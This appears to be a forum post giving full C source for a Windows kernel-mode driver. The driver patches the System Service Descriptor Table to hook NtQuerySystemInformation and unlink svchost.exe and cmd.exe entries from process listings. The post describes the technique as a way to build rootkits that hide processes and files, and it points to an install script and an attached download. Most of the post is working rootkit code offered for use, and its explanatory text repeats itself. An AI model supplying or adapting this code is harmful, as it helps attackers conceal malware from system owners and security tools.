When you open Task Manager, you see the list of running processes. This list is queried by calling the NtQuerySystemInformation function. When this function is called with SystemProcessInformatiion (5) information class, the function return a data structure that contain the running process list. By modifing this data structure, we can hide running processes in Task Manager or any other programs.
With the NtQuerySystemInformation hook, we can modify the data structure and hide running processes.
In this example, I will hook the NtQuerySystemInformation function with SSDT hooking. A kernel mode driver is used to hook the SSDT.
The hook will hide all running svchost.exe and cmd.exe processes.
To install the driver, open the install.bat batch file.
SSDT hooking is a powerful technique. It allow you to create powerful kernel mode rootkits that can hide and protect process, files, etc.
With the NtQuerySystemInformation hook, we can modify the data structure and hide running processes.
In this example, I will hook the NtQuerySystemInformation function with SSDT hooking. A kernel mode driver is used to hook the SSDT.
The hook will hide all running svchost.exe and cmd.exe processes.
CODE C Language
#include <ntddk.h>
typedef struct _KSERVICE_DESCRIPTOR_TABLE
{
PULONG ServiceTableBase;
PULONG ServiceCounterTableBase;
ULONG NumberOfServices;
PUCHAR ParamTableBase;
}KSERVICE_DESCRIPTOR_TABLE,*PKSERVICE_DESCRIPTOR_TABLE;
typedef struct _SYSTEM_PROCESS_INFO
{
ULONG NextEntryOffset;
ULONG NumberOfThreads;
LARGE_INTEGER Reserved[3];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ImageName;
ULONG BasePriority;
HANDLE ProcessId;
HANDLE InheritedFromProcessId;
}SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO;
typedef NTSTATUS (*pNtQuerySystemInformation)(ULONG,PVOID,ULONG,PULONG);
extern PKSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG,PVOID,ULONG,PULONG);
pNtQuerySystemInformation fnNtQuerySystemInformation;
PVOID Hook(ULONG ServiceNumber,PVOID Hook)
{
PVOID OrigAddress;
OrigAddress=(PVOID)KeServiceDescriptorTable->ServiceTableBase[ServiceNumber];
__asm
{
cli
mov eax,cr0
and eax,not 0x10000
mov cr0,eax
}
KeServiceDescriptorTable->ServiceTableBase[ServiceNumber]=(ULONG)Hook;
__asm
{
mov eax,cr0
or eax,0x10000
mov cr0,eax
sti
}
return OrigAddress;
}
NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength)
{
PSYSTEM_PROCESS_INFO pCurr,pNext;
NTSTATUS ret;
if(InfoClass!=5)
{
return fnNtQuerySystemInformation(InfoClass,Buffer,Length,ReturnLength);
}
ret=fnNtQuerySystemInformation(InfoClass,Buffer,Length,ReturnLength);
if(NT_SUCCESS(ret))
{
pCurr=NULL;
pNext=Buffer;
while(pNext->NextEntryOffset!=0)
{
pCurr=pNext;
pNext=(PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr+pCurr->NextEntryOffset);
if(!wcscmp(L"svchost.exe",pNext->ImageName.Buffer))
{
if(pNext->NextEntryOffset==0)
{
pCurr->NextEntryOffset=0;
}
else
{
pCurr->NextEntryOffset+=pNext->NextEntryOffset;
}
pNext=pCurr;
}
if(!wcscmp(L"cmd.exe",pNext->ImageName.Buffer))
{
if(pNext->NextEntryOffset==0)
{
pCurr->NextEntryOffset=0;
}
else
{
pCurr->NextEntryOffset+=pNext->NextEntryOffset;
}
pNext=pCurr;
}
}
}
return ret;
}
void Unload(PDRIVER_OBJECT pDriverObject)
{
DbgPrint("Unload routine called.\n");
Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation+1),fnNtQuerySystemInformation);
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)
{
pDriverObject->DriverUnload=Unload;
fnNtQuerySystemInformation=Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation+1),HookNtQuerySystemInformation);
DbgPrint("NtQuerySystemInformation address: %#x\n",fnNtQuerySystemInformation);
return STATUS_SUCCESS;
}
To install the driver, open the install.bat batch file.
SSDT hooking is a powerful technique. It allow you to create powerful kernel mode rootkits that can hide and protect process, files, etc.
Attached Files
-
![Attached File]()
HideProcess.zip 72.16K
102 downloads
